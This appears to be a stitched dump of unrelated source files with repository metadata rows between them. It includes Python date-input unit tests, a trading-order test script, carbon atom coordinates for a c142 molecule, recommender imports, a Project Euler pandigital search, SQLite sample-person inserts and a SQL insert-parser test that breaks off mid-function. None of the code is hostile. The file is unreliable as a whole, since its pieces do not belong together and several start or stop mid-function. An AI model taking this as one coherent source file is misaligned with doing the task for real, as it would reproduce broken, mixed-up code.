self.assertEqual(2, d.month)
self.assertEqual(1970, d.year)
@patch("builtins.input", side_effect=["01/02/9999"])
def test_future_date_is_valid(self, _):
d = input_date("")
self.assertTrue(isinstance(d, datetime.date))
self.assertEqual(1, d.day)
self.assertEqual(2, d.month)
self.assertEqual(9999, d.year)
@patch("builtins.input", side_effect=[" 01/02/2021 "])
def test_leading_trailing_whitespace_is_ignored(self, _):
d = input_date("")
self.assertTrue(isinstance(d, datetime.date))
self.assertEqual(1, d.day)
self.assertEqual(2, d.month)
self.assertEqual(2021, d.year)
@patch("builtins.input", side_effect=[""])
def test_empty_input_cancels(self, _):
d = input_date("")
self.assertIsNone(d)
@patch("builtins.input", side_effect=["This is not a date"])
def test_invalid_date_errors(self, _):
with self.assertRaises(ValueError):
_ = input_date("")
@patch("builtins.input", side_effect=[datetime.datetime.now().strftime("%d/%m/%Y")])
def test_now_is_not_a_valid_past_date(self, _):
# This is potentially vulnerable to failure if the tests starts at midnight and we're now in
# the next day ... choosing to treat this as an unlikely edge case
with self.assertRaises(ValueError):
_ = input_past_date("")
@patch("builtins.input", side_effect=["01/02/9999"])
def test_future_date_is_not_a_valid_past_date(self, _):
with self.assertRaises(ValueError):
_ = input_past_date("")
@patch("builtins.input", side_effect=["01/02/1970"])
def test_past_date_is_valid_past_date(self, _):
d = input_past_date("")
self.assertTrue(isinstance(d, datetime.date))
self.assertEqual(1, d.day)
self.assertEqual(2, d.month)
self.assertEqual(1970, d.year)
@patch("builtins.input", side_effect=[datetime.datetime.now().strftime("%d/%m/%Y")])
def test_now_is_not_a_valid_future_date(self, _):
# This is potentially vulnerable to failure if the tests starts at midnight and we're now in
# the next day ... choosing to treat this as an unlikely edge case
with self.assertRaises(ValueError):
_ = input_future_date("")
@patch("builtins.input", side_effect=["01/02/1970"])
def test_past_date_is_not_a_valid_future_date(self, _):
with self.assertRaises(ValueError):
_ = input_future_date("")
@patch("builtins.input", side_effect=["01/02/9999"])
def test_future_date_is_a_valid_future_date(self, _):
d = input_future_date("")
self.assertTrue(isinstance(d, datetime.date))
self.assertEqual(1, d.day)
self.assertEqual(2, d.month)
self.assertEqual(9999, d.year)
| 41.467391
| 100
| 0.661599
| 519
| 3,815
| 4.630058
| 0.157996
| 0.066583
| 0.089888
| 0.109863
| 0.823138
| 0.795672
| 0.777778
| 0.741573
| 0.741573
| 0.726176
| 0
| 0.028486
| 0.20865
| 3,815
| 91
| 101
| 41.923077
| 0.767473
| 0.122412
| 0
| 0.597222
| 0
| 0
| 0.085004
| 0
| 0
| 0
| 0
| 0
| 0.416667
| 1
| 0.166667
| false
| 0
| 0.055556
| 0
| 0.236111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
066754047c8e2323659f471b3eca642b4238725c
| 6,979
|
py
|
Python
|
tests/scripts/v1/ts_order_market.py
|
tradepython/pixiu
|
8f4639c2b3b620e641e5cd19842c007707f26e12
|
[
"Apache-2.0"
] | 3
|
2021-07-12T10:50:26.000Z
|
2022-02-24T10:30:03.000Z
|
tests/scripts/v1/ts_order_market.py
|
tradepython/pixiu
|
8f4639c2b3b620e641e5cd19842c007707f26e12
|
[
"Apache-2.0"
] | null | null | null |
tests/scripts/v1/ts_order_market.py
|
tradepython/pixiu
|
8f4639c2b3b620e641e5cd19842c007707f26e12
|
[
"Apache-2.0"
] | null | null | null |
#
point = SymbolInfo("point")
volume = 0.01
assertEqual(AcquireLock("test"), True)
ReleaseLock("test")
score = 1.0
errid, result = Buy(volume=volume, tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
errid, ret = WaitCommand(result['command_uid'])
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, 0)
assertEqual(order.take_profit, 0)
assertEqual(order.tags['score'], score)
if result['command_uid']:
assertEqual(order.comment, f"cuid#{result['command_uid']}|")
else:
assertEqual(order.comment, f"uid#{result['order_uid']}|")
# assertIsNone(order.magic_number)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
#
#Buy with sl and tp
stop_loss=Bid()-15*point
take_profit=Ask()+30*point
errid, result = Buy(volume=0.01, price=Ask(), stop_loss=stop_loss,
take_profit=take_profit, tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, stop_loss)
assertEqual(order.take_profit, take_profit)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
assertEqual(order.tags['score'], score)
#Buy all params
stop_loss=Bid()-15*point
take_profit=Ask()+30*point
magic_number=4291651
errid, result = Buy(volume=0.01, price=Ask(), stop_loss=stop_loss,
take_profit=take_profit, magic_number=magic_number,
symbol=Symbol(), slippage=3, arrow_color="white", tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, stop_loss)
assertEqual(order.take_profit, take_profit)
assertEqual(order.magic_number, magic_number)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
assertEqual(order.tags['score'], score)
#
stop_loss = stop_loss - 15 * point
take_profit = take_profit + 30 * point
errid, result = ModifyOrder(result['order_uid'], stop_loss=stop_loss, take_profit=take_profit, tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, stop_loss)
assertEqual(order.take_profit, take_profit)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
assertEqual(order.tags['score'], score)
#close order
# errid, result = CloseOrder(result['order_uid'], price=Ask(), volume=volume)
errid, result = CloseOrder(result['order_uid'], tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertIsNotNone(order.close_time)
assertEqual(order.close_price, Bid())
assertEqual(order.tags['score'], score)
#The order was closed ?
oo = GetOpenedOrderUIDs()
for t in oo:
assertNotEqual(t, result['order_uid'])
# Sell
errid, result = Sell(volume=0.01, tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, 0)
assertEqual(order.take_profit, 0)
assertIsNone(order.magic_number)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
assertEqual(order.tags['score'], score)
#Sell with sl and tp
stop_loss = Ask() + 15 * point
take_profit = Bid() - 30 * point
errid, result = Sell(volume=0.01, price=Bid(), stop_loss=Ask()+15*point,
take_profit=Bid()-30*point, tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, stop_loss)
assertEqual(order.take_profit, take_profit)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
assertEqual(order.tags['score'], score)
#Sell all params
magic_number=4291652
errid, result = Sell(volume=volume, price=Bid(), stop_loss=stop_loss,
take_profit=take_profit, magic_number=magic_number,
symbol=Symbol(), slippage=3, arrow_color="red", tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, stop_loss)
assertEqual(order.take_profit, take_profit)
assertEqual(order.magic_number, magic_number)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
assertEqual(order.tags['score'], score)
#
stop_loss = stop_loss + 15 * point
take_profit = take_profit - 30 * point
errid, result = ModifyOrder(result['order_uid'], stop_loss=stop_loss, take_profit=take_profit, tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, stop_loss)
assertEqual(order.take_profit, take_profit)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
assertEqual(order.tags['score'], score)
#close order
# errid, result = CloseOrder(result['order_uid'], price=Bid(), volume=volume)
errid, result = CloseOrder(result['order_uid'], tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertIsNotNone(order.close_time)
assertEqual(order.close_price, Ask())
assertEqual(order.tags['score'], score)
#The order was closed ?
oo = GetOpenedOrderUIDs()
for t in oo:
assertNotEqual(t, result['order_uid'])
set_test_result("OK")
StopTester()
| 32.310185
| 117
| 0.762144
| 920
| 6,979
| 5.618478
| 0.080435
| 0.179532
| 0.100213
| 0.04024
| 0.922422
| 0.916618
| 0.903076
| 0.903076
| 0.903076
| 0.903076
| 0
| 0.012782
| 0.09199
| 6,979
| 216
| 118
| 32.310185
| 0.802904
| 0.045995
| 0
| 0.828729
| 0
| 0
| 0.076182
| 0.008281
| 0
| 0
| 0
| 0
| 0.662983
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0686d41acd2715d4d5c4f1db33d234d4cf0dd79e
| 8,024
|
py
|
Python
|
lib/systems/c142.py
|
pulsar-chem/BPModule
|
f8e64e04fdb01947708f098e833600c459c2ff0e
|
[
"BSD-3-Clause"
] | null | null | null |
lib/systems/c142.py
|
pulsar-chem/BPModule
|
f8e64e04fdb01947708f098e833600c459c2ff0e
|
[
"BSD-3-Clause"
] | null | null | null |
lib/systems/c142.py
|
pulsar-chem/BPModule
|
f8e64e04fdb01947708f098e833600c459c2ff0e
|
[
"BSD-3-Clause"
] | null | null | null |
import pulsar as psr
def load_ref_system():
""" Returns c142 as found in the IQMol fragment library.
All credit to https://github.com/nutjunkie/IQmol
"""
return psr.make_system("""
C 4.24517 -2.31413 2.31413
C 2.31413 -2.31413 4.24517
C 2.31413 -4.24517 2.31413
C 4.34594 -2.36585 -1.22556
C 3.49086 -3.49086 1.72725
C 2.68020 -2.68020 0.75831
C 2.36585 -4.34594 -1.22556
C 3.55361 -3.55361 -1.76286
C 2.76040 -2.76040 -2.76040
C 4.34594 1.22556 2.36585
C 2.36585 1.22556 4.34594
C 3.49086 -1.72725 3.49086
C 2.68020 -0.75831 2.68020
C 4.37229 -1.17118 1.17118
C 4.37229 1.17118 -1.17118
C 3.60803 0.03068 1.77090
C 2.68504 0.85234 0.85234
C 3.60803 -1.77090 -0.03068
C 2.68504 -0.85234 -0.85234
C 4.34594 -1.22556 -2.36585
C 3.60803 -0.03068 -1.77090
C 2.68020 0.75831 -2.68020
C 3.55361 -1.76286 -3.55361
C 2.36585 -1.22556 -4.34594
C 3.55361 1.76286 3.55361
C 2.76040 2.76040 2.76040
C 4.34594 2.36585 1.22556
C 3.55361 3.55361 1.76286
C 2.36585 4.34594 1.22556
C 3.60803 1.77090 0.03068
C 2.68020 2.68020 -0.75831
C 4.24517 2.31413 -2.31413
C 3.49086 3.49086 -1.72725
C 2.31413 4.24517 -2.31413
C 3.49086 1.72725 -3.49086
C 2.31413 2.31413 -4.24517
C 1.72725 -3.49086 3.49086
C 0.75831 -2.68020 2.68020
C -1.22556 -2.36585 4.34594
C -1.22556 -4.34594 2.36585
C 1.17118 -4.37229 1.17118
C 1.77090 -3.60803 -0.03068
C 0.85234 -2.68504 -0.85234
C -0.03068 -3.60803 1.77090
C -0.85234 -2.68504 0.85234
C -1.17118 -4.37229 -1.17118
C 1.22556 -4.34594 -2.36585
C 1.76286 -3.55361 -3.55361
C 1.22556 -2.36585 -4.34594
C 0.03068 -3.60803 -1.77090
C -0.75831 -2.68020 -2.68020
C 1.17118 -1.17118 4.37229
C 1.77090 0.03068 3.60803
C 0.85234 0.85234 2.68504
C -1.17118 1.17118 4.37229
C -0.03068 -1.77090 3.60803
C -0.85234 -0.85234 2.68504
C 1.73610 -1.73610 1.73610
C 0.87307 -0.87307 0.87307
C 1.77542 0.00000 -0.00000
C 0.87307 0.87307 -0.87307
C 0.00000 -0.00000 1.77542
C -0.87307 0.87307 0.87307
C 0.00000 -1.77542 -0.00000
C -0.87307 -0.87307 -0.87307
C 1.76728 -1.76728 -1.76728
C 0.85234 -0.85234 -2.68504
C 1.77090 -0.03068 -3.60803
C 1.17118 1.17118 -4.37229
C -0.00000 0.00000 -1.77542
C -0.85234 0.85234 -2.68504
C 0.03068 -1.77090 -3.60803
C -1.17118 -1.17118 -4.37229
C 1.22556 2.36585 4.34594
C 1.76286 3.55361 3.55361
C 1.22556 4.34594 2.36585
C 0.03068 1.77090 3.60803
C -0.75831 2.68020 2.68020
C 1.76728 1.76728 1.76728
C 0.85234 2.68504 0.85234
C 1.77090 3.60803 0.03068
C 1.17118 4.37229 -1.17118
C 0.03068 3.60803 1.77090
C -1.17118 4.37229 1.17118
C -0.00000 1.77542 0.00000
C -0.85234 2.68504 -0.85234
C 1.73610 1.73610 -1.73610
C 0.75831 2.68020 -2.68020
C 1.72725 3.49086 -3.49086
C -0.03068 3.60803 -1.77090
C -1.22556 4.34594 -2.36585
C -0.03068 1.77090 -3.60803
C -1.22556 2.36585 -4.34594
C -1.76286 -3.55361 3.55361
C -2.76040 -2.76040 2.76040
C -2.36585 -4.34594 1.22556
C -1.77090 -3.60803 0.03068
C -2.68020 -2.68020 -0.75831
C -3.55361 -3.55361 1.76286
C -4.34594 -2.36585 1.22556
C -2.31413 -4.24517 -2.31413
C -1.72725 -3.49086 -3.49086
C -2.31413 -2.31413 -4.24517
C -3.49086 -3.49086 -1.72725
C -4.24517 -2.31413 -2.31413
C -2.36585 -1.22556 4.34594
C -1.77090 -0.03068 3.60803
C -2.68020 0.75831 2.68020
C -3.55361 -1.76286 3.55361
C -4.34594 -1.22556 2.36585
C -1.76728 -1.76728 1.76728
C -2.68504 -0.85234 0.85234
C -1.77542 -0.00000 0.00000
C -2.68504 0.85234 -0.85234
C -3.60803 -0.03068 1.77090
C -4.37229 1.17118 1.17118
C -3.60803 -1.77090 0.03068
C -4.37229 -1.17118 -1.17118
C -1.73610 -1.73610 -1.73610
C -2.68020 -0.75831 -2.68020
C -1.77090 0.03068 -3.60803
C -2.36585 1.22556 -4.34594
C -3.60803 0.03068 -1.77090
C -4.34594 1.22556 -2.36585
C -3.49086 -1.72725 -3.49086
C -2.31413 2.31413 4.24517
C -1.72725 3.49086 3.49086
C -2.31413 4.24517 2.31413
C -3.49086 1.72725 3.49086
C -4.24517 2.31413 2.31413
C -1.73610 1.73610 1.73610
C -2.68020 2.68020 0.75831
C -1.77090 3.60803 -0.03068
C -2.36585 4.34594 -1.22556
C -3.49086 3.49086 1.72725
C -3.60803 1.77090 -0.03068
C -4.34594 2.36585 -1.22556
C -1.76728 1.76728 -1.76728
C -2.76040 2.76040 -2.76040
C -1.76286 3.55361 -3.55361
C -3.55361 3.55361 -1.76286
C -3.55361 1.76286 -3.55361
""")
| 53.493333
| 60
| 0.353315
| 1,023
| 8,024
| 2.768328
| 0.053763
| 0.029661
| 0.019774
| 0.033898
| 0.952684
| 0.952684
| 0.952684
| 0.946328
| 0.753531
| 0.388065
| 0
| 0.731352
| 0.563933
| 8,024
| 149
| 61
| 53.852349
| 0.078022
| 0.012587
| 0
| 0
| 0
| 0
| 0.989371
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006849
| true
| 0
| 0.006849
| 0
| 0.020548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
0697d1f381bd764fb5e54bfad843a1ed0e011e21
| 158
|
py
|
Python
|
elliot/recommender/knn/__init__.py
|
gategill/elliot
|
113763ba6d595976e14ead2e3d460d9705cd882e
|
[
"Apache-2.0"
] | 175
|
2021-03-04T15:46:25.000Z
|
2022-03-31T05:56:58.000Z
|
elliot/recommender/knn/__init__.py
|
gategill/elliot
|
113763ba6d595976e14ead2e3d460d9705cd882e
|
[
"Apache-2.0"
] | 15
|
2021-03-06T17:53:56.000Z
|
2022-03-24T17:02:07.000Z
|
elliot/recommender/knn/__init__.py
|
gategill/elliot
|
113763ba6d595976e14ead2e3d460d9705cd882e
|
[
"Apache-2.0"
] | 39
|
2021-03-04T15:46:26.000Z
|
2022-03-09T15:37:12.000Z
|
from .item_knn import ItemKNN
from .user_knn import UserKNN
from .attribute_item_knn import AttributeItemKNN
from .attribute_user_knn import AttributeUserKNN
| 31.6
| 48
| 0.873418
| 22
| 158
| 6
| 0.454545
| 0.272727
| 0.19697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101266
| 158
| 4
| 49
| 39.5
| 0.929577
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
88cbff563a69c6dfadf5f2014eebb55434e49247
| 47
|
py
|
Python
|
src/lib/multiprocessing/__init__.py
|
DTenore/skulpt
|
098d20acfb088d6db85535132c324b7ac2f2d212
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
src/lib/multiprocessing/__init__.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
src/lib/multiprocessing/__init__.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
import _sk_fail; _sk_fail._("multiprocessing")
| 23.5
| 46
| 0.808511
| 6
| 47
| 5.5
| 0.666667
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06383
| 47
| 1
| 47
| 47
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0.319149
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
88ea27c6189210526a984a3ed1f41aa17177f141
| 74
|
py
|
Python
|
testchild.py
|
Saira55/test2
|
7e85e8d188b1ab83bbe9bd768671ab6304cb0f6e
|
[
"Apache-2.0"
] | null | null | null |
testchild.py
|
Saira55/test2
|
7e85e8d188b1ab83bbe9bd768671ab6304cb0f6e
|
[
"Apache-2.0"
] | 1
|
2021-10-15T11:17:30.000Z
|
2021-10-15T11:17:30.000Z
|
testchild.py
|
Saira55/test2
|
7e85e8d188b1ab83bbe9bd768671ab6304cb0f6e
|
[
"Apache-2.0"
] | null | null | null |
## Adding anew file in the child branch
print ("Inside the child branch")
| 24.666667
| 39
| 0.743243
| 12
| 74
| 4.583333
| 0.75
| 0.290909
| 0.509091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175676
| 74
| 2
| 40
| 37
| 0.901639
| 0.486486
| 0
| 0
| 0
| 0
| 0.657143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
cca141604aef071be5496f03c2ed6d04101ce735
| 1,858
|
py
|
Python
|
p30-39/p38.py
|
kbrose/project_euler
|
f582ef1887f44628997e05d88253adad0822d6b9
|
[
"Unlicense"
] | 1
|
2015-10-11T15:53:00.000Z
|
2015-10-11T15:53:00.000Z
|
p30-39/p38.py
|
kbrose/project_euler
|
f582ef1887f44628997e05d88253adad0822d6b9
|
[
"Unlicense"
] | null | null | null |
p30-39/p38.py
|
kbrose/project_euler
|
f582ef1887f44628997e05d88253adad0822d6b9
|
[
"Unlicense"
] | null | null | null |
from array import *
def ispan(n):
digs = [0]*10
while n > 0:
if digs[n % 10]:
return 0
digs[n % 10] = 1
n = n / 10
for i in xrange(1,10):
if digs[i] == 0:
return 0
return 1
def LogPlusOne(n):
i = 0
while 10**i <= n:
i = i + 1
return i
currmax = 0
for i in xrange(9,10):
cand = 2
num = i
NumOfDigits = LogPlusOne(num)
while NumOfDigits < 9:
num = (num * (10**LogPlusOne(i * cand))) + (i * cand)
NumOfDigits = LogPlusOne(num)
cand = cand + 1
if NumOfDigits > 9:
continue
if ispan(num):
if num > currmax:
currmax = num
print i, num
for i in xrange(90,100):
cand = 2
num = i
NumOfDigits = LogPlusOne(num)
while NumOfDigits < 9:
num = (num * (10**LogPlusOne(i * cand))) + (i * cand)
NumOfDigits = LogPlusOne(num)
cand = cand + 1
if NumOfDigits > 9:
continue
if ispan(num):
if num > currmax:
currmax = num
print i, num
for i in xrange(900,1000):
cand = 2
num = i
NumOfDigits = LogPlusOne(num)
while NumOfDigits < 9:
num = (num * (10**LogPlusOne(i * cand))) + (i * cand)
NumOfDigits = LogPlusOne(num)
cand = cand + 1
if NumOfDigits > 9:
continue
if ispan(num):
if num > currmax:
currmax = num
print i, num
for i in xrange(9000,10000):
cand = 2
num = i
NumOfDigits = LogPlusOne(num)
while NumOfDigits < 9:
num = (num * (10**LogPlusOne(i * cand))) + (i * cand)
NumOfDigits = LogPlusOne(num)
cand = cand + 1
if NumOfDigits > 9:
continue
if ispan(num):
if num > currmax:
currmax = num
print i, num
print "max found: ", currmax
| 22.658537
| 61
| 0.502691
| 239
| 1,858
| 3.90795
| 0.142259
| 0.179872
| 0.205567
| 0.06424
| 0.783726
| 0.783726
| 0.783726
| 0.783726
| 0.783726
| 0.783726
| 0
| 0.062335
| 0.386975
| 1,858
| 81
| 62
| 22.938272
| 0.757682
| 0
| 0
| 0.72
| 0
| 0
| 0.00592
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.013333
| null | null | 0.066667
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ccd5021b70ece591eca647382ee9fdc2d58b0344
| 1,141
|
py
|
Python
|
Base de Datos/Ejemplo/escritura_2.py
|
FR98/quinto-compu
|
ea62c400bb41fdd860b85ba889ce5b6393cb89e2
|
[
"MIT"
] | null | null | null |
Base de Datos/Ejemplo/escritura_2.py
|
FR98/quinto-compu
|
ea62c400bb41fdd860b85ba889ce5b6393cb89e2
|
[
"MIT"
] | null | null | null |
Base de Datos/Ejemplo/escritura_2.py
|
FR98/quinto-compu
|
ea62c400bb41fdd860b85ba889ce5b6393cb89e2
|
[
"MIT"
] | null | null | null |
import sqlite3
conn = sqlite3.connect('personas.db')
conn.execute("INSERT INTO Persona(familia_id, nombre, apellido, edad) VALUES(10, 'Willi', 'Rosal', 17)")
conn.execute("INSERT INTO Persona(familia_id, nombre, apellido, edad) VALUES(20, 'Karen', 'Caballeros', 16)")
conn.execute("INSERT INTO Persona(familia_id, nombre, apellido, edad) VALUES(10, 'Emanuel', 'Rosal', 15)")
conn.execute("INSERT INTO Persona(familia_id, nombre, apellido, edad) VALUES(10, 'David', 'Rosal', 14)")
conn.execute("INSERT INTO Persona(familia_id, nombre, apellido, edad) VALUES(10, 'Pablo', 'Rosal', 12)")
conn.execute("INSERT INTO Persona(familia_id, nombre, apellido, edad) VALUES(1, 'Willi', 'Rosal', 17)")
conn.execute("INSERT INTO Persona(familia_id, nombre, apellido, edad) VALUES(2, 'Karen', 'Caballeros', 16)")
conn.execute("INSERT INTO Persona(familia_id, nombre, apellido, edad) VALUES(1, 'Emanuel', 'Rosal', 15)")
conn.execute("INSERT INTO Persona(familia_id, nombre, apellido, edad) VALUES(1, 'David', 'Rosal', 14)")
conn.execute("INSERT INTO Persona(familia_id, nombre, apellido, edad) VALUES(1, 'Pablo', 'Rosal', 12)")
conn.commit()
conn.close()
| 67.117647
| 109
| 0.726556
| 161
| 1,141
| 5.086957
| 0.21118
| 0.13431
| 0.20757
| 0.25641
| 0.893773
| 0.893773
| 0.893773
| 0.893773
| 0.893773
| 0.893773
| 0
| 0.035853
| 0.09553
| 1,141
| 17
| 110
| 67.117647
| 0.757752
| 0
| 0
| 0
| 0
| 0.714286
| 0.788091
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
aea7e8f0e2b280ab0d344627c699c9ad17fa4df3
| 2,123
|
py
|
Python
|
tests/formats/mysql/file_reader/test_insert_parser.py
|
cmancone/mygrations
|
30d1d568ca7d6c38dbc5211834dd2d04c0bcf078
|
[
"MIT"
] | 10
|
2018-04-09T08:39:42.000Z
|
2022-03-14T15:36:05.000Z
|
tests/formats/mysql/file_reader/test_insert_parser.py
|
cmancone/mygrations
|
30d1d568ca7d6c38dbc5211834dd2d04c0bcf078
|
[
"MIT"
] | 14
|
2018-05-02T11:14:08.000Z
|
2022-01-15T18:48:54.000Z
|
tests/formats/mysql/file_reader/test_insert_parser.py
|
cmancone/mygrations
|
30d1d568ca7d6c38dbc5211834dd2d04c0bcf078
|
[
"MIT"
] | 5
|
2018-07-18T02:20:48.000Z
|
2022-02-19T09:32:07.000Z
|
import unittest
from mygrations.formats.mysql.file_reader.insert_parser import insert_parser
class test_insert_parser(unittest.TestCase):
def test_simple(self):
parser = insert_parser()
returned = parser.parse("INSERT INTO test_table (`col1`,`col2`) VALUES ('val','val2');")
# we should have matched
self.assertTrue(parser.matched)
# and we should have matched everything
self.assertEquals('', returned)
# we should have lots of data now
self.assertEquals('test_table', parser.table)
self.assertEquals(['col1', 'col2'], parser.columns)
self.assertEquals([['val', 'val2']], parser.raw_rows)
self.assertTrue(parser.has_semicolon)
self.assertEquals([], parser.errors)
def test_multiple_values(self):
parser = insert_parser()
returned = parser.parse("INSERT INTO test_table (`col1`,`col2`) VALUES ('val','val2'),('val3','val4')")
# we should have matched
self.assertTrue(parser.matched)
# and we should have matched everything
self.assertEquals('', returned)
# we should have lots of data now
self.assertEquals('test_table', parser.table)
self.assertEquals(['col1', 'col2'], parser.columns)
self.assertEquals([['val', 'val2'], ['val3', 'val4']], parser.raw_rows)
self.assertFalse(parser.has_semicolon)
self.assertEquals([], parser.errors)
def test_missing_comma(self):
parser = insert_parser()
returned = parser.parse("INSERT INTO test_table (`col1`,`col2`) VALUES ('val','val2')('val3','val4')")
# we should have matched
self.assertTrue(parser.matched)
# and we should have matched everything
self.assertEquals('', returned)
# we should have lots of data now
self.assertEquals('test_table', parser.table)
self.assertEquals(['col1', 'col2'], parser.columns)
